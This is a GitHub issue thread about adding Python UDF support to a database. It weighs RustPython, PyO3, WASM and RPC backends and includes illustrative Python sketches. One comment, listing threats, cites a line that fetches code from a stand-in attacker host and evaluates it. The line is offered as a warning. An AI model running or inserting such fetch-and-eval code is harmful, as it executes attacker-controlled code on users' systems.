Python UDF Support #3777

tisonkun · 2024-04-23T07:08:32Z

What problem does the new feature solve?

This supersedes:

We should revisit the support for Python UDFs. Currently, it suffers from the following challenges:

Using sql="..." in the decorator args to declare inputs is a somewhat hacky solution. Ideally, we should build a solution like PL/Python in Postgres to describe the args and return types, as well as embedded scripts, instead of depending on a series of ad hoc conventions.
The upstream RustPython doesn't support GC yet, and thus, we can hardly catch up with the upstream, which is evolving quickly.
It's still undetermined how to support multiple Python versions with the PyO3 backend.

What does the feature do?

There are several tasks we can do to improve the situation:

Move forward "(READY FOR REVIEW) Garbage collect: A stop-the-world cycle collector" (RustPython/RustPython#4180), and then upgrade RustPython to the latest version.
Investigate supporting multiple Python versions with the PyO3 backend.
Investigate the distribution model when enabling the PyO3 backend by default.

For supporting multiple Python versions with the PyO3 backend, here are several related threads:


tisonkun · 2024-05-15T09:04:19Z

@discord9 I'd now prefer to keep the pyo3 feature gate but drop the RustPython support. As a result, the default binary won't support Python scripting at all. Handling the host Python environment in our distribution seems quite subtle and challenging.

We may still need a design for the whole Python UDF feature under this distribution decision. Also, the current scripts table solution can suffer from #2510.

sundy-li · 2024-05-17T03:08:31Z

We have also encountered this issue in databendlabs/databend#15494 via pyo3.

Dynamic library linking is unacceptable in a distribution release.

Maybe we can build the Python code into WASM?

https://wasmer.io/posts/py2wasm-a-python-to-wasm-compiler
https://gregoryszorc.com/docs/pyoxidizer/main/pyembed.html

tisonkun · 2024-05-20T16:27:22Z

@sundy-li Thanks for participating in this thread.

I'm afraid the WASM solution would be no better than the RustPython solution: both can ship basic Python support without linkage issues.

However, the major use cases of Python UDFs are to integrate with the broad scientific computing (scipy), data analysis (numpy, pandas), and ML/AI ecosystems. All of them require a full CPython environment as well as its (C) extension support.

Over the last weekend, I drafted a proposal that, at least in GreptimeDB, we can implement Python UDFs as follows:

Support the CREATE FUNCTION syntax. A demo can be:

CREATE FUNCTION udf_name(arg0 [opt_ty0], ...)
RETURNS (ret0 [opt_ty0], ...) AS 
$$
...
$$
LANGUAGE python3;

Run a CreateFunctionProcedure to register the UDF in the FUNCTION_REGISTRY, and also update the global scripts table.
Then, leverage the current UDF framework to support querying a Python UDF like a normal UDF.
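The registration step above can be sketched in a few lines of Python. This is only an illustration under stated assumptions, not GreptimeDB code: the regular expression, `UdfDefinition`, `parse_create_function`, and `create_function` are hypothetical names, and plain dicts stand in for the FUNCTION_REGISTRY and the scripts table. The pattern is deliberately naive (for example, it does not handle types that contain parentheses).

```python
import re
from dataclasses import dataclass

# Hypothetical, simplified pattern for the proposed syntax. A real
# implementation would extend the SQL parser instead of using a regex.
CREATE_FUNCTION_RE = re.compile(
    r"CREATE\s+FUNCTION\s+(?P<name>\w+)\s*\((?P<args>[^)]*)\)\s*"
    r"RETURNS\s*\((?P<rets>[^)]*)\)\s*AS\s*"
    r"\$\$(?P<body>.*?)\$\$\s*"
    r"LANGUAGE\s+(?P<lang>\w+)\s*;",
    re.IGNORECASE | re.DOTALL,
)


@dataclass
class UdfDefinition:
    name: str
    args: list      # (name, type or None) pairs
    returns: list   # (name, type or None) pairs
    body: str
    language: str


def _parse_columns(text):
    """Split 'a ty_a, b' into [('a', 'ty_a'), ('b', None)]."""
    columns = []
    for item in text.split(","):
        parts = item.split()
        if parts:
            columns.append((parts[0], parts[1] if len(parts) > 1 else None))
    return columns


def parse_create_function(sql):
    match = CREATE_FUNCTION_RE.search(sql)
    if match is None:
        raise ValueError("not a CREATE FUNCTION statement")
    return UdfDefinition(
        name=match["name"],
        args=_parse_columns(match["args"]),
        returns=_parse_columns(match["rets"]),
        body=match["body"].strip(),
        language=match["lang"].lower(),
    )


def create_function(sql, function_registry, scripts_table):
    """Persist the statement, then register the parsed UDF in memory."""
    udf = parse_create_function(sql)
    scripts_table[udf.name] = sql       # stand-in for the scripts table
    function_registry[udf.name] = udf   # stand-in for FUNCTION_REGISTRY
    return udf
```

Storing the original statement (rather than only the parsed form) keeps the scripts table the single source from which the in-memory registry can be rebuilt.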

We will still have a feature such as pyo3_backend or something similar, so that whether a Python UDF is able to run is determined at runtime.

Upon failure, a restarted server will load the scripts table and register all the UDFs. Other nodes will be notified of a newly registered UDF in the same way as for a newly created table, following the meta server pub-sub mechanism.
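A minimal in-process sketch of this recovery and notification flow follows. Everything here is an assumption made for illustration: `MetaPubSub` is a toy stand-in for the meta server pub-sub mechanism, `Node` is a hypothetical server, and a shared dict plays the role of the durable scripts table.

```python
class MetaPubSub:
    """Toy stand-in for the meta server pub-sub mechanism (hypothetical)."""

    def __init__(self):
        self._subscribers = []

    def subscribe(self, callback):
        self._subscribers.append(callback)

    def publish(self, event):
        for callback in self._subscribers:
            callback(event)


class Node:
    """Hypothetical server holding an in-memory function registry."""

    def __init__(self, name, scripts_table, pubsub):
        self.name = name
        self.scripts_table = scripts_table  # shared, durable storage
        self.function_registry = {}         # in-memory, lost on restart
        self.pubsub = pubsub
        pubsub.subscribe(self.on_udf_created)
        # On (re)start, rebuild the registry from the scripts table.
        self.reload_from_scripts_table()

    def reload_from_scripts_table(self):
        self.function_registry = dict(self.scripts_table)

    def create_function(self, udf_name, source):
        # Persist first, then notify every node (including this one).
        self.scripts_table[udf_name] = source
        self.pubsub.publish({"udf": udf_name})

    def on_udf_created(self, event):
        name = event["udf"]
        self.function_registry[name] = self.scripts_table[name]
```

Persisting before publishing means a node that misses the notification still picks up the UDF the next time it reloads the scripts table.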

In this way, we don't need the "script engine" or its HTTP endpoints at all, and we can fully follow the SQL standard. Thus, we can avoid much of the confusion and misalignment we found previously (#2434 #2532).

Open questions

Following PG's CREATE FUNCTION docs, functions are scoped per schema and can be restricted by the permission model. In our first version, though, we can use a globally shared scripts table, and later break it down per schema (or add a schema column to describe each function's owner/scope).
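One way to picture the "add a schema column" option is a lookup keyed by (schema, name) that falls back to the global scope. This is a sketch under assumptions: `GLOBAL_SCOPE`, `register`, and `resolve` are hypothetical names, the fallback order is one possible choice rather than a decided design, and a dict stands in for the scripts table.

```python
GLOBAL_SCOPE = None  # hypothetical marker: the function has no owning schema


def register(scripts, name, source, schema=GLOBAL_SCOPE):
    """Store a function under its (schema, name) key."""
    scripts[(schema, name)] = source


def resolve(scripts, name, current_schema):
    """Prefer a function scoped to the current schema, then a global one."""
    for scope in (current_schema, GLOBAL_SCOPE):
        source = scripts.get((scope, name))
        if source is not None:
            return source
    raise KeyError(name)
```

With this shape, functions registered in the first (global) version keep resolving after schema-scoped functions are introduced.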

Zheaoli · 2024-05-21T17:50:05Z

> Maybe we can build the Python code into WASM?

WASM is a very bad idea. I have tried something like this before in similar circumstances (gateway UDFs/custom plugins).

Python has official WASM support, but it is still in the experimental phase. Also, if you choose WASM, you lose most C extension support by default.

The challenges of Python UDFs, in my mind, are the following:

Python interpreter version support: how do you choose which Python versions to support?
Package installation: how do users install their own packages?
Resource restrictions and protection against malicious code, such as eval(requests.get("https://evil.com").text).
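To make the resource-restriction point concrete, here is a minimal sketch that runs a script in a separate interpreter with a wall-clock limit. `run_untrusted` is a hypothetical helper, not something from this thread or from GreptimeDB. It only bounds run time and isolates the interpreter's import path and environment variables; it does not block network or filesystem access, so it is not a sandbox against code like the eval example above.

```python
import subprocess
import sys


def run_untrusted(source, timeout_seconds=2.0):
    """Run `source` in a child interpreter and return (ok, output)."""
    try:
        completed = subprocess.run(
            # -I: isolated mode (ignores PYTHON* variables and user site-packages)
            [sys.executable, "-I", "-c", source],
            capture_output=True,
            text=True,
            timeout=timeout_seconds,  # the child is killed when this expires
        )
    except subprocess.TimeoutExpired:
        return False, "timed out"
    if completed.returncode != 0:
        return False, completed.stderr.strip()
    return True, completed.stdout.strip()
```

Memory limits and network isolation would need OS-level mechanisms (for example containers or cgroups), which this sketch leaves out.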

In my past experience, many gateway developers and I chose RPC as the solution:

We provide a set of SDKs or an official Docker image. People run the image or SDK code on their own.
We register the RPC endpoint with something like CREATE UDF ENDPOINT 'abc.abc.com'.
People can then run their customized code on their own.
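The RPC approach can be sketched with Python's standard-library XML-RPC modules. This is only an illustration: XML-RPC is a stand-in transport chosen because it ships with Python, and `add_one`, `start_udf_server`, and `call_remote_udf` are hypothetical names. The thread does not say which protocol any real SDK uses.

```python
import threading
from xmlrpc.client import ServerProxy
from xmlrpc.server import SimpleXMLRPCServer


def add_one(column):
    """User-side UDF: receives a whole argument column per call."""
    return [value + 1 for value in column]


def start_udf_server():
    """User side: expose the UDF on an ephemeral local port."""
    server = SimpleXMLRPCServer(("127.0.0.1", 0), logRequests=False)
    server.register_function(add_one, "add_one")
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def call_remote_udf(endpoint, name, column):
    """Database side: ship the column to the registered endpoint."""
    with ServerProxy(endpoint) as proxy:
        return getattr(proxy, name)(column)
```

Every call serializes the full argument column and sends it over the network, so the cost grows with the amount of data passed to the UDF.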

sundy-li · 2024-05-21T23:47:31Z

> In my past experience, many gateway developers and I chose RPC as the solution

Yes, we have external functions that work this way. It works, but it's not efficient because we need to pass the argument columns over the network via RPC.

It seems Snowpark is a sidecar container.

This was referenced Apr 23, 2024:

Upgrade rustpython #3063 (Closed)
refactor!: drop RustPython support #3749 (Closed)
fix: dynamically get python udf from scripts table #3774 (Closed)

tisonkun added the "help wanted" label Apr 23, 2024
